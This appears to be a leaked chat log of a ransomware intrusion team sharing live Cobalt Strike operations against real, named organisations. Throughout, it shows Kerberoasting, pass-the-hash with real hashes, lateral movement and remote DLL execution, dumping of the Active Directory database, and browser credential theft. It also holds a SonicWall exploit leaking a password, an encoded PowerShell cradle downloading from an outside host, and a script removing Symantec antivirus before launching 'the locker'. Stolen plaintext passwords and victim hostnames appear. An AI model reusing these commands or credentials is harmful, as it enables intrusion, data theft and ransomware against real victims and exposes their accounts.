255.255.255.255 255.255.255.255 On-link 192.168.0.80 306
================================================= =========================
Persistent Routes:
None

Date: 2020-09-29T09:33:15.676Z
From: user8
User1-2 beacon> shell net share
[*] Tasked beacon to run: net share
[+] host called home, sent: 40 bytes
Share name Resource Remark
C$ C:\ Default share
IPC$ Remote IPC
ADMIN$ C:\windows Remote Admin

Date: 2020-09-29T09:12:37.703Z
From: user8
Message: pinged sqls
AWS-VTBCSQL01.matches.com [10.7.19.25]
EC2AMAZ-U49LCLF.matches.com [10.1.4.4]
AWS-VTBIMSTRI03.matches.com [10.7.18.36]

Date: 2020-09-29T08:57:35.135Z
From: user4
Message: ok. received

Date: 2020-09-29T08:56:53.255Z
From: tl1
Message: then I suggest the following:
- try to connect it to vpn
- collect all mssql servers from the ad_comps list and check the sa account or try sploits


Date: 2020-09-30T08:47:32.732Z
From: tl1
Message: if a `beacon_reverse_tcp` load works in a `Windows Executable (S)` that passed through `shellConcatenation.1.0.0`, but does not work through `rportfwd`, the problem is most likely in `rportfwd` itself

Date: 2020-10-01T16:37:28.528Z
From: user9
Message: ````
beacon>audit_uac
[*] Tasked Beacon to audit UAC settings
[+] host called home, sent: 149229 bytes
[+] SBolley is a local Administrator!
[Info] DETSBOLLEY23063 is Windows 10.0.18363.
[+] Invoke-SluiBypass should work to bypass UAC.
[+] Invoke-FodhelperBypass should work to bypass UAC.
[+] Invoke-TokenDuplication should work to bypass UAC.
````
Invoke-FodhelperBypass - blocks AV
Invoke-SluiBypass - hung seiiyu
Invoke-TokenDuplication - not working

Date: 2020-10-02T08:45:31.607Z
From: user8
beacon> psinject 7256 x64 Invoke-ShareFinder
[*] Tasked beacon to psinject: Invoke-ShareFinder into 7256 (x64)
[+] host called home, sent: 133723 bytes
ERROR: Exception calling "FindAll" with "0" argument(s): "The specified domain either does not exist or
ERROR: could not be contacted.
ERROR: At line:849 char:9
ERROR: + $CompSearcher.FindAll() | ForEach-Object {
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: FullyQualifiedErrorId : COMException
WARNING:
[!] No hosts found!
beacon> net view \\hostname /all
[*] Tasked beacon to run net view on \\hostname /all
[+] host called home, sent: 104504 bytes
List of hosts for domain '\\hostname /all':
Server Name IP Address Platform Version Type Comment

Date: 2020-10-02T13:42:18.100Z
From: user9
Message: in test lab on Windows 10 version 1909 with defender enabled
works out SharpFodhelperBypass (https://github.com/FatRodzianko/SharpFodhelperBypass)
example - execute-assembly /home/user/Desktop/SharpFodhelperBypass.exe Y21kIC9jIHJ1bmRsbDMyIEM6XFByb2dyYW1EYXRhXHg2NC5kbGwgZW50cnlQb2ludA==
command in base64 (cmd /c rundll32 C:\ProgramData\x64.dll entryPoint)

Date: 2020-10-02T17:01:30.219Z
From: user7
Message: `execute-assembly Rubeus.exe kerberoast /format:hashcat /outfile:C:\ProgramData\hashes_rub_all.txt`

Date: 2020-10-03T14:10:05.156Z
From: tl1
for /f %s in (srv.txt) do @ (echo %s)

Date: 2020-10-03T14:06:18.801Z
From: tl1
Message: add () for first loop

Date: 2020-10-03T14:05:14.249Z
From: tl1
Message: did it work?

Date: 2020-10-03T13:51:50.320Z
From: tl1
Message: it's better to check immediately on the dedic

Date: 2020-10-03T13:51:10.926Z
From: user8
for /f %s in (srv.txt) do @
for /f %p in (pwd.txt) do @ (osql -S %s -U sa -P %p -Q "select @@servername" >> result.txt && echo %s:%p >> result. txt)

Date: 2020-10-03T14:47:59.586Z
From: user4
Message: fig knows - this is from group policies
`<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2 " changed="2017-10-27 14:28:20" uid="{C36CFE81-5D6F-444F-981A-E4A0095AEB9F}"><Properties action="U" newName="" fullName="" description="" cpassword="ZDNIgxXxcpyYuVsI1dItzBw3icVJ2LMHIv2RVOAw1mA" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>`

Date: 2020-10-03T15:30:30.072Z
From: user8
shell adfind.exe -f "(objectcategory=person)" -s base > ad_users.txt

Date: 2020-10-03T16:54:05.814Z
From: user4
Message: I know it's late.... but
$job = foreach($line in (Get-Content hostlist.txt)){
	if(Test-Connection -ComputerName $line -Count 1 -Quiet ){
		Start-Sleep -s 3
	
		Write-Warning $line
		Write-output "$line - Active"
	}
$job | out-file alive.txt -Append

Date: 2020-10-05T14:19:47.818Z
From: user8
[*] Tasked beacon to psinject: invoke-kerberoast -domain datacenter.local -outputformat hashcat | fl | out-file -filepath c:\ProgramData\datacenterlocalhash.txt -append -force -encoding UTF8 into 840 (x64)
[+] host called home, sent: 133723 bytes
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/C360SQL3:56162' from user 'CN=usatlhc-sql,CN=Users,DC=datacenter,DC=local' : Exception calling ".ctor" with "1 " argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."

Date: 2020-10-05T14:20:09.531Z
From: user7
user 2-2[AUHDC1-CSQCIN39]SYSTEM */2132|2020Oct05 17:18:22> psinject 2132 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain standards.com.au | fl into 2132 (x64)
[+] host called home, sent: 133723 bytes
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/asnet2000.standards.com.au:1433' from user 'CN=geronimo,OU=Users Pre-MOE,OU=SAI-Global,DC=standards,DC =com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05677XPD.standards.com.au:1433' from user 'CN=Sam Allen,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI -Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execution for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05591XPN.standards.com.au:1433' from user 'CN=Raymond Yuen,OU=Users-Disabled,OU=Users,OU=SAI-Global - objects NOT to be migrated,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details ."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/05556WD.standards.com.au:1433' from user 'CN=Aaron Flew,OU=Migrated Users - DO NOT MODIFY acounts,OU=Users,OU=SAI -Global,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execution for details."
WARNING: [Get-DomainSPNTicket] Error requesting ticket for SPN 'MSSQLSvc/SYDIIS.standards.com.au:1700' from user 'CN=SQLSrvService,OU=Service Accounts,DC=standards,DC=com,DC=au' : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were unable to create a Kerberos credential, see inner execption for details."
what 's wrong?

Date: 2020-10-05T14:25:23.369Z
From: user3
beacon> psinject 440 x64 Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl
[*] Tasked beacon to psinject: Invoke-Kerberoast -OutputFormat HashCat -Domain datacenter.local | fl into 440 (x64)
[+] host called home, sent: 133723 bytes
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execution for details."
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<<()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: FullyQualifiedErrorId : InvokeMethodOnNull
ERROR: New-Object : Exception calling ".ctor" with "1" argument(s): "The NetworkCredentials provided were
ERROR: unable to create a Kerberos credential, see inner execution for details."
ERROR: At line:555 char:33
ERROR: + $Ticket = New-Object <<<< System.IdentityModel.Tokens.KerberosRequestorSecurityToken
ERROR: -ArgumentList $UserSPN
ERROR: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvocationException
ERROR: FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.PowerShell.Commands.NewOb
ERROR: jectCommand
ERROR: GetRequest : You cannot call a method on a null-valued expression.
ERROR: At line:556 char:51
ERROR: + $TicketByteStream = $Ticket.GetRequest <<<<()
ERROR: + CategoryInfo : InvalidOperation: (GetRequest:String) [], RuntimeException
ERROR: FullyQualifiedErrorId : InvokeMethodOnNull

Date: 2020-10-05T14:57:14.929Z
From: user8
beacon> make_token saig.frd.global\sqladmin u5t3r
[*] Tasked beacon to create a token for saig.frd.global\sqladmin
[+] host called home, sent: 48 bytes
beacon> upload /home/user/Desktop/cobalt/dll_maker/x64.dll
[*] Tasked beacon to upload /home/user/Desktop/cobalt/dll_maker/x64.dll as x64.dll
[+] host called home, sent: 139699 bytes
beacon> shell copy x64.dll \\datacenter.local\C$\windows
[*] Tasked beacon to run: copy x64.dll \\datacenter.local\C$\windows
[+] host called home, sent: 73 bytes

Date: 2020-10-05T15:03:32.674Z
From: user9
beacon> make_token saig.frd.global\Americadpm B0b@f3tt
[*] Tasked beacon to create a token for saig.frd.global\Americadpm
beacon> shell copy x64.dll \\10.212.8.247\C$\ProgramData
[*] Tasked beacon to run: copy x64.dll \\10.212.8.247\C$\ProgramData
[+] host called home, sent: 73 bytes
1 file(s) copied.
beacon> shell wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[*] Tasked beacon to run: wmic /node:10.212.8.247 process call create "rundll32 C:\ProgramData\x64.dll entryPoint"
[+] host called home, sent: 119 bytes
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
	ProcessId = 8036;
	ReturnValue = 0;
};

Date: 2020-10-05T20:47:55.186Z	
	From: user7
	Message: shell adfind.exe -b dc=standards,dc=com,dc=au -f "(objectcategory=organizationalUnit)" > C:\Programdata\standards_ad_ous.txt
	Date: 2020-10-05T20:37:36.974Z
	From: user7
	Message: shell nltest /dclist:c360.local
	
Date: 2020-10-05T21:29:46.705Z
From: user8
beacon> pth datacenter.local\adm.barsmr0 fabb67c5be20e99698dbc77e751afb3f
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.barsmr0 /domain:datacenter.local /ntlm:fabb67c5be20e99698dbc77e751afb3f /run:"%COMSPEC% /c echo d19dee36172 > \\.\pipe\eb999d" command
[+] host called home, sent: 438886 bytes
user 	: adm.barsmr0
domain 	: datacenter.local
program 	: C:\Windows\system32\cmd.exe /c echo d19dee36172 > \\.\pipe\eb999d
NTLM 	: fabb67c5be20e99698dbc77e751afb3f
| PID 836
| TID 1784
| LUID 0 ; 1753376140 (00000000:6882658c)
\_ msv1_0 - data copy @ 000000EAA17DC2B0 : OK !
\_ kerberos - data copy @ 000000EABD39BA68
\_des_cbc_md5 -> null
\_des_cbc_crc -> null
\_ *Password replace @ 000000EAA17D1D98 (16) -> null
beacon> jump psexec_psh datacenter.local https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH)
[+] host called home, sent: 214268 bytes
[-] Could not open service control manager on datacenter.local: 5
[-] Could not connect to pipe (\\datacenter.local\pipe\status_d482): 1909
beacon> rev2self
[*] Tasked beacon to revert token
beacon> pth datacenter.local\adm.taydav1 24aa312899f051fbc1a5b464de82c802
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.taydav1 /domain:datacenter.local /ntlm:24aa312899f051fbc1a5b464de82c802 /run:"%COMSPEC% /c echo 3a6015fae67 > \\.\pipe\9f382d" command
beacon> jump psexec_psh USHDC1-CSPADS02 https
[*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH)
[+] host called home, sent: 653145 bytes
[-] Could not open service control manager on USHDC1-CSPADS02: 1722
[-] Could not connect to pipe (\\USHDC1-CSPADS02\pipe\status_d482): 53
user 	: adm.taydav1
domain 	: datacenter.local
program 	: C:\Windows\system32\cmd.exe /c echo 3a6015fae67 > \\.\pipe\9f382d
impers. 	: no
NTLM 	: 24aa312899f051fbc1a5b464de82c802
| PID 6972
| TID 6260
| LUID 0 ; 1752989744 (00000000:687c8030)
\_ msv1_0 - data copy @ 000000EAA17DD480 : OK !
\_ kerberos - data copy @ 000000EABD39BD78
\_des_cbc_md5 -> null
\_des_cbc_crc -> null
\_ *Password replace @ 000000EAA18BC2F8 (16) -> null

Date: 2020-10-06T00:21:24.677Z
From: user3
beacon> run ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" qq
[*] Tasked beacon to run: ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" qq
[+] host called home, sent: 78 bytes
ntdsutil: ac in ntds
Active instance set to "ntds".
ntdsutil:ifm
ifm: cr fu c:\windows\temp\abcd
Creating snapshot...
Snapshot set {30839d3a-489d-4c9e-9a4f-feea14764ebf} generated successfully.
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} mounted as C:\$SNAP_202010061119_VOLUMEC$\
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} is already mounted.
Initiating DEFRAGMENTATION mode...
Source Database: C:\$SNAP_202010061119_VOLUMEC$\Windows\NTDS\ntds.dit
Target Database: c:\windows\temp\abcd\Active Directory\ntds.dit
Defragmentation Status (%complete)
0 10 20 30 40 50 60 70 80 90 100
|----|----|----|----|----|----|----|----|----|---- |
................................................. .
Copying registry files...
Copying c:\windows\temp\abcd\registry\SYSTEM
Copying c:\windows\temp\abcd\registry\SECURITY
Snapshot {402158c9-f22e-4d42-aaae-a52bf2e96cc8} unmounted.
IFM media created successfully in c:\windows\temp\abcd
ifm: q
ntdsutil: q

Date: 2020-10-06T23:52:39.143Z	
	From: user9
	Message: ```
	inside hell info, hashes, creds.txt etc
	and yet, since the report will be an archive, next to the ad_ * .txt files, make a file creds.txt In which
	DCs
	DA
	EA
	LA
	cleartext credits if any
	Date: 2020-10-06T23:40:08.698Z
	From: user9
	Message: if present, delete this:
	include(script_resource("modules/insleep.cna"));
	Date: 2020-10-06T23:39:29.379Z
	From: user3
	Message: ```
	popup beacon_bottom {
	menu "TW-toolkit"{
	include(script_resource("modules/checkvm.cna"));
	include(script_resource("modules/clearev.cna"));
	include(script_resource("modules/FireWall.cna"));
	include(script_resource("modules/persistence.cna"));
	include(script_resource("modules/RDP.cna"));
	include(script_resource("modules/Win2012mimikatz.cna"));
	include(script_resource("modules/cmd.cna"));
	include(script_resource("modules/sleep.cna"));
	include(script_resource("rdpthief/RdpThief.cna"));
	include(script_resource("modules/collect.cna"));
	include(script_resource("modules/chrome.cna"));
	}
	}
execute-assembly /SharpChrome.exe logins /showall

Date: 2020-10-06T15:23:03.300Z
From: user3
Message: ```
beacon> execute-assembly /home/user/tools/ShWeb/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:
=== Chrome (Current User) ===
[+] received output:
[X] Exception: The parameter is incorrect.
=== Checking for Firefox (Current User) ===
=== Checking Windows Vaults ===
[-] Invoke_3 on EntryPoint failed.

Date: 2020-10-06T15:22:57.658Z
From: user8
Message: ```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpWeb.exe all
[*] Tasked beacon to run .NET program: SharpWeb.exe all
[+] host called home, sent: 705073 bytes
[+] received output:
=== Chrome (Current User) ===
[X] Exception: The parameter is incorrect.
=== Checking for Firefox (Current User) ===
=== Checking Windows Vaults ===
[-] Invoke_3 on EntryPoint failed.

Message: when you do `spawn MISH`

Message: `lsassy [--hashes [LM:]NT] --dumppath /share/path/to/dump.dmp [<domain>/]<user>[:<password>]@<target>`

Date: 2020-10-12T19:13:31.356Z
From: user3
Message: ```
remote-exec psexec 192.168.100.103 rundll32 C:\ProgramData\1580759637.bdinstall.dll entryPoint
shell copy 1580759637.bdinstall.dll \\192.168.100.103\C$\ProgramData\

Date: 2020-10-13T22:00:42.920Z
From: user8
Message: ```
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%%i\C$\Windows\System32\starter.exe && wmic /node:% %i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt

Date: 2020-10-15T19:36:36.899Z
From: user8
Message: ```
beacon> run AdFind.bat
[*] Tasked beacon to run: AdFind.bat

Date: 2020-12-09T17:23:42.231Z	
	From: user8
	Message: notepad.exe >> file >> open >> C:\system32 >> cmd.exe >> pkm >> run

Date: 2021-01-19T20:30:55.796Z	
	From: user7
	Message: `execute-assembly SharpSharesNG.exe ips list servaki.txt --alive --output servaki-alive.txt` fastlist ping )
	Date: 2021-01-19T20:30:21.681Z
	From: user4
	Message: ```
	* SharpSharesNG <ips|shares> --max-threads 10 --output console|/path/to/file
	*
	* ips-equiv ips ad
	* ips 10.0.0.1 [--os-detect] [--alive] [--exec] script\path
	* ips 10.0.0.1/24 [--os-detect] [--alive] [--exec] script\path
	* ips HostName [--os-detect] [--alive] [--exec] script\path
	* ips [ad] [--os-detect] [--alive] [--exec] script\path
	* ips [list] c:\users\hostlist.txt [--os-detect] [--alive] [--exec] script\path
	*
	*
	* shares - equiv shares ad
	* shares 10.0.0.1 [--os-detect] [--public-only]
	* shares 10.0.0.1/24 [--os-detect] [--public-only]
	* shares HostName [--os-detect] [--public-only]
	* shares [ad] [--os-detect] [--public-only]
	* shares [list] c:\users\hostlist.txt [--os-detect] [--public-only]

Date: 2021-02-16T21:19:34.312Z	
	From: tl1
	Message: ```
	[+] Checking URL https://50.233.57.77
	[+] Found latest version (9.x+) of SMA appliance
	[+] Appliance running version 10.2.0.0-14sv
	[+] Leaking sessions to dump configuration.
Date: 2021-02-17T14:27:29.912Z	
	From: tl1
	Message: ```
	Group name Domain Admins
	Comment Designated administrators of the domain
	Members
	bbt0097 reconwindomp suQARSp_admin
	suWATprod
	The command completed successfully.
Date: 2021-02-18T10:57:44.924Z	
	From: tl1
	Message: ```
	+] Checking URL https://50.233.57.77
	[+] Found latest version (9.x+) of SMA appliance
	[+] Appliance running version 10.2.0.0-14sv
	[+] Leaking sessions to dump configuration.
	[+] Found: SessionID: P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck= userType: 1 userName: hemrick Password: HEcbccanal20201996 Domain: CANALBARGE
	[+] Done with https://50.233.57.77, found 1 sessions
	one
	[+] Saving session data
	[+] Trying session P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck=
	[+] Saving config to ./Dumps/50.233.57.77/config.sqlite
	[================================================ =]
	[+] Config dumped
	[+] Parsing configuration data
	[+] Finding users
	[+] Found 209 users
	[+] Finding AD credentials
	[!!] Found Active Directory creds
	[+] AD creds :@10.0.10.12
	[+] AD creds :@10.0.10.12
	[+] Looking for LDAP domain creds
	[-] No LDAP credentials found.
	[+] Looking for RADIUS domain creds
	[-] No usable RADIUS domain data
	[+] Parsing bookmarks
	[+] Found bookmarks, Hunting for creds
	[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
	{'userGroupID': 115, 'name': 'net extender', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jhecht'}

Date: 2020-12-20T21:20:26.067Z
From: Andy
Message: above and below code `powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`
you can throw garbage code, saves from some av,

Date: 2020-12-20T21:17:34.548Z
From: Andy
Message: Enter `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("here is your code that we saved powershell ....."))`
an example of what mine looks like: `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient). downloadstring('https://domain.com:443/updates'))"""))`
note that there are more quotes ""IEX and at the end ))""")) this is how you need to put quotes
Click on the Run Script green icon as in the screenshot
And at the bottom, copy the encrypted code, in my case, `cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA ==`

Create a new .ps1 and paste it into it
`powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`,
example of my code:
`powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAG QAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA ==`

Date: 2020-12-20T21:15:46.574Z
From: Andy
Message: - here where "/ups" we put anything, you can't do it 2 times with the same name, you did c "/a" the second time you need to change "/a", for example "/ab", etc.
- Local Host (your koba domain)
- Local Port (port, you need 443)
the rest is as on the screen, ticks and click Launch.
The code will crash, example: `powershell.exe .....`, copy it, save it somewhere

Date: 2020-12-20T03:13:00.027Z
From: alter
Message: well, this is dns yes

Date: 2020-12-20T03:12:41.543Z
From: VasyaPypkin
Message: (Get-ADComputer -Properties ipv4address, lastlogondate, operatingsystem -Filter {enabled -eq "true" -and OperatingSystem -Like '*Windows Server*'})

Date: 2021-01-12T16:22:07.194Z
From: VasyaPypkin
Message: Example:
To create a dump file for the sqlservr process, the command would be:
C:\userdump sqlservr.exe sqlservr.dmp
So the running process is dumped?

Date: 2021-01-18T13:48:38.114Z
From: rosette
Message: Remove simantek by powershell. A reboot is required, but after starting this code, it takes 3-5 minutes to remove and you can jump on the smb listener and start the locker. This is without a pass.

Date: 2021-01-18T13:47:35.158Z
From: rosette
Message: ```$SEP_GUID = Get-WmiObject Win32_Product | Where-Object {$_.Name -like "Symantec Endpoint Protection"} | Select-Object -ExpandProperty IdentifyingNumber
#Uninstall SEP - All versions. - Wait for uninstallation to complete
$SEP_arglist = "/uninstall $SEP_GUID /qn"
If ($SEP_GUID -ne $null){
(Start-Process msiexec.exe -ArgumentList $SEP_arglist -Wait -PassThru).ExitCode
If ($LASTEXITCODE -eq 1){
Write-Host "Symantec Uninstall Successful... Continuing"
}
ElseIf ($LASTEXITCODE -ne 1){
throw "Symantec Uninstall Failed... Exiting"
}
}

Date: 2021-01-29T10:48:17.105Z
From: samuel
Message: hello everyone :v: maybe someone faced such a problem with java? or prompt. did at first mana.
```
https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html
```
does not create a ppa repository. then I tried

```
sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list

sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A

sudo apt-get update

sudo apt-get install oracle-java15-installer

sudo apt install oracle-java15-set-default
```
such an out
```
root@kali:~# sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list
deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main
root@kali:~# sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
Executing: /tmp/apt-key-gpghome.aOn8uUjdxO/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
gpg: key EA8CACC073C3DB2A: "Launchpad PPA for Linux Uprising" not changed
gpg: Total number processed: 1
gpg: unchanged: 1
root@kali:~# sudo apt-get update
Hit:1 http://deb.anydesk.com all InRelease
Ign:2 http://ftp.debian.org/debian jessie-backports InRelease
Hit:3 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease
Get:4 http://ftp.debian.org/debian stretch-backports InRelease [91.8 kB]
Hit:5 http://packages.microsoft.com/repos/vscode stable InRelease
Hit:6 http://ppa.launchpad.net/linuxuprising/java/ubuntu focal InRelease
Err:9 http://ftp.debian.org/debian jessie-backports Release
404 Not Found [IP: 151.101.134.132 80]
Hit:7 http://ftp1.nluug.nl/os/Linux/distr/kali kali-rolling InRelease
Hit:10 http://linux.teamviewer.com/deb stable InRelease
Reading package lists... Done
E: The repository 'http://ftp.debian.org/debian jessie-backports Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
root@kali:~# sudo apt-get install oracle-java15-installer
Reading package lists... Done
building dependency tree
Reading state information... Done
oracle-java15-installer is already the newest version (15.0.2-1~linuxuprising0).
0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded.
root@kali:~# sudo apt install oracle-java15-set-default
Reading package lists... Done
building dependency tree
Reading state information... Done
oracle-java15-set-default is already the newest version (15.0.2-1~linuxuprising0).
0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded.
root@kali:~# java -version
java version "15.0.2" 2021-01-19
Java(TM) SE Runtime Environment (build 15.0.2+7-27)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.2+7-27, mixed mode, sharing)
root@kali:~#
```
```
root@kali:~/Cobalt42_v2# ./cobaltstrike
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
``
```
root@kali:/opt/tomcat# sudo update-java-alternatives -l
java-1.11.0-openjdk-amd64 1111 /usr/lib/jvm/java-1.11.0-openjdk-amd64
java-15-oracle 1091 /usr/lib/jvm/java-15-oracle
java-1.8.0-openjdk-amd64 1081 /usr/lib/jvm/java-1.8.0-openjdk-amd64
```
I read that the problem is in Tomcat, I didnt have it installed at all. rolled him up. specified the path in Java.
```
root@kali:/opt/tomcat# sudo systemctl status tomcat
 tomcat.service - Apache Tomcat Web Application Container
Loaded: loaded (/etc/systemd/system/tomcat.service; disabled; vendor preset: disabled)
Active: active (running) since Fri 2021-01-29 05:35:46 EST; 5s ago
Process: 34567 ExecStart=/opt/tomcat/bin/startup.sh (code=exited, status=0/SUCCESS)
Main PID: 34574 (java)
Tasks: 30 (limit: 6977)
Memory: 161.9M
CGroup: /system.slice/tomcat.service
34574 /usr/lib/jvm/java-15-oracle/bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properti>

Jan 29 05:35:46 kali systemd[1]: Starting Apache Tomcat Web Application Container...
Jan 29 05:35:46 kali startup.sh[34567]: Tomcat started.
Jan 29 05:35:46 kali systemd[1]: Started Apache Tomcat Web Application Container.
lines 1-13/13 (END)
```
```
./cobaltstrike
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument

Date: 2021-02-03T18:25:16.449Z
From: slice
Message: ```
foreach($line in Get-Content .\file.txt) {
if($line -match $regex){
# Work here
}
}
```

Date: 2021-02-03T01:05:24.713Z
From: slice
Message: in a loop, for example

Date: 2021-02-03T01:03:41.373Z
From: white
Message: powershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB }}-AutoSize
who will tell you how to correctly point to a file with ip addresses so as not to drive them in with a comma
tried : `(Get-Content C:\programdata\list.txt)` but it says invalid argument
output:
```
#<CLIXML
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><SS="Error">Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_</S><SS="Error">ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_</S><SS="Error">ry the command again._x000D__x000A_</S><SS="Error">At line:1 char:54_x000D__x000A_</ S><SS="Error">+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_</S><SS="Error">ata ..._x000D__x000A_</S><SS=" Error">+ ~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_</S><SS="Error">~~~_x000D__x000A_</S><SS ="Error"> + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_</S><SS="Error"> ngValidationException_x000D__x000A_</S><SS="Error"> + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft .Power _x000D__x000A_</S><SS="Error"> Shell.Commands.GetWmiObjectCommand_x000D__x000A_</S><SS="Error"> _x000D__x000A_</S></Objs>

Date: 2021-02-03T01:03:41.373Z
From: white
